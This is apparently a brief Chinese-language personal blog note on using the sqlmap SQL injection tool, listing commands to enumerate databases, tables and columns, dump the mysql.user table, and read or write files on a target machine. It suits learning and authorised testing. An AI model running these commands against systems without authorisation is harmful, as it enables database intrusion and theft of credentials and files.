SQLMAP是一款跨平台,开源的SQL注入“企业级”工具,但同时也是很适合个人学习的工具。功能强大,下面是自己使用SQLMAP的一些总结体会。
基本用法
进到sqlmap目录下:python sqlmap.py -u "http://target.com/login.php?id=3&submit=submit"
加入目标URL里有SQL注入漏洞,则会出现结果:
成功注入
详细参数
- --dbs: 列出所有的数据库
--dbs
- -D table --tables: 列出table表的所有数据库
-D mysql --tables:列出"mysql"库中的所有表
- -D mysql -T user --columns:列出库mysql下表user的所有字段
-D mysql -T user --columns
- -D mysql -T user -C "User, Host, is_role": 列出user表中字段“User,Host,is_role”的值
-D mysql -T user -C "User, Host, is_role"
- --file-read "C:\devlist.txt":读取C盘下(目标机)的devlist.txt文件
--file-read "C:\devlist.txt"
- --file-write "C:\devlist.txt" --file-dest "G:\devcp.txt":将"C:\devlist.txt"文件写入目录"G:\devcp.txt"
--file-write "C:\devlist.txt" --file-dest "G:\devcp.txt"(没有权限写)
其他参数
others
至少有一个
2016.10.13 晚 上海
